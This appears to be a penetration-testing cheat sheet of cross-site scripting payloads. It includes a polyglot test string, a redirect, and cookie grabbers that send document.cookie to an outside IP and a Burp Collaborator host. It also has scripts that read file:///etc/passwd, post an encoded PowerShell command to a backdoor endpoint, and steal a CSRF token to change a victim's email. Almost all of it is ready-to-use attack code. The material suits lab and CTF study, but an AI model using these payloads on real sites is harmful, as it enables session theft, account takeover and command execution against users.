XSS

Cross-Site Scripting

Ultimate checker: '"/><script>print()</script>.

Redirections

<head> 
  <meta http-equiv="refresh" content="0; URL=http://www.example.com/" />
</head>

Data Grabbers

Cookies

Img tag:

<img src="x" onerror="this.src='http://10.10.15.123/?c='+btoa(document.cookie)">

Fetch:

<script>
fetch('https://<SESSION>.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>

XMLHttpRequest

XSS to LFI

<script>
var xhr = new XMLHttpRequest;
xhr.onload = function() {
	document.write(this.responseText);
};
xhr.open("GET", "file:///etc/passwd");
xhr.send();
</script>
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText);};x.open("GET","file:///etc/passwd");x.send();</script>

XSS to CSRF

If the endpoint is accessible only from localhost:

<script>
var xhr;
if (window.XMLHttpRequest) {
	xhr = new XMLHttpRequest();
} else {
	xhr = new ActiveXObject("Microsoft.XMLHTTP");
}
xhr.open("POST", "/backdoor.php");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send("cmd=powershell -enc ...");
</script>

With capturing CSRF token first:

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/email', true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('POST', '/email/change-email', true);
    changeReq.send('csrf='+token+'&email=test@example.com')
};
</script>

Last updated